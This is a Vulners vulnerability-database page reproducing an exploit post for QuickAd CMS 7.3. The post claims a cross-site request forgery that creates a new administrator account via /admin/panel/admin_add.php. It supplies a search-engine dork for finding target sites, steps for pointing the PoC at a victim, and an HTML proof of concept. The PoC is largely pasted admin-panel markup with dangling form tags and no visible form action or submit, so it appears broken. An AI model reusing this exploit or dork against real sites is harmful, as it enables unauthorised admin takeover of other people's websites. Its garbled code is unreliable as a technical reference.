Vulners
Lucene search
QUICKAD CMS 7.3 Cross Site Request Forgery
`====================================================================================================================================
| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 |
| # Dork : "Bylancer, All right reserved" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 61.
[+] Set the target site link Save changes and apply .
[+] infected file : /admin/panel/admin_add.php .
[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php .
[+] save code as poc.html .
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<!-- Google fonts -->
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" />
<!-- Page JS Plugins CSS -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" />
<!-- css select2 -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" />
<!-- Zeunix CSS stylesheets -->
<link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" />
<link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" />
<link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" />
<link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" />
<link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" />
<link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" />
<!-- End Stylesheets -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css">
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css">
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" />
<!--alerts CSS -->
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css">
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css">
<script>
var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';
</script>
</head>
<body class="app-ui layout-has-drawer layout-has-fixed-header">
<div class="app-layout-canvas">
<div class="app-layout-container">
<aside class="app-layout-drawer">
<!-- Drawer scroll area -->
<div class="app-layout-drawer-scroll">
<!-- Drawer logo -->
<div id="logo" class="drawer-header">
<main class="app-layout-content">
<!-- Page Content -->
<div class="container-fluid p-y-md">
<!-- Partial Table -->
<div class="card">
<div class="card-header">
<h4>Admin users</h4>
<div class="pull-right">
<a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a>
</div>
</div>
<div class="card-block">
<div id="js-table-list">
<table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable">
<thead>
<tr>
<th class="text-center w-5 sortingNone">
<label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0">
<input type="checkbox" id="check-all" name="check-all"><span></span>
</label>
</th>
<th><i class="ion-image"></i> Admin user</th>
<th class="w-10">Email</th>
<th style="width: 60px;">Actions</th>
</tr>
</thead>
<tbody id="ajax-services">
</tbody>
</table>
</div>
</div>
<!-- .card-block -->
</div>
<!-- .card -->
<!-- End Partial Table -->
</div>
<!-- .container-fluid -->
<!-- End Page Content -->
</main>
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<div class="site-action">
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>
</button>
<div class="site-action-buttons">
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">
<i class="icon ion-android-delete" aria-hidden="true"></i>
</button>
</div>
</div>
<div class="col-md-12">
<!-- Site Action -->
<div class="site-action">
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>
</button>
<div class="site-action-buttons">
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">
<i class="icon ion-android-delete" aria-hidden="true"></i>
</button>
</div>
</div>
<div class="form-group">
<label for="exampleInputfullname">Full Name<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-person"></i></div>
<input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required="">
<span class="help-block"></span>
</div>
</div>
</div>
<h4 class="box-title">User Login Details</h4>
<hr>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputuname">Username<code>*</code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-person"></i></div>
<input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required="">
</div>
</div>
</div>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputEmail1">Email address<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-android-mail"></i></div>
<input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required="">
</div>
</div>
</div>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputpwd1">Password<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-android-lock"></i></div>
<input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required="">
</div>
</div>
</div>
</div>
<div class="row">
</div>
</div>
</form>
</div>
</div>
</div>
<!-- /.row -->
</div>
</div>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
=======================================================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1